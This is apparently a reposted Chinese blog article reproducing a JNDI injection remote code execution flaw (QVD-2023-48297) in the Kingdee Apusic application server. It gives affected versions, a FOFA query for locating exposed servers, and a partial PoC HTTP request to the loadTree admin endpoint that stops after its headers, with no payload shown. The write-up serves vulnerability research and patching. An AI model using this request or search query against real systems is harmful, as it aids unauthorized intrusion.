本文主要是介绍金蝶Apusic应用服务器 loadTree JNDI注入漏洞复现(QVD-2023-48297),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
金蝶Apusic应用服务器是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。
0x02 漏洞概述
由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份补丁已出,金蝶EAS也存在类似漏洞,只是路径不一样)
0x03 影响范围
影响版本
金蝶Apusic应用服务器 <= V9.0 SP7
不受影响版本
金蝶Apusic应用服务器 > V9.0 SP7
0x04 复现环境
FOFA:app="Apusic应用服务器"
0x05 漏洞复现
PoC
POST /admin//protect/jndi/loadTree HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh
这篇关于金蝶Apusic应用服务器 loadTree JNDI注入漏洞复现(QVD-2023-48297)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!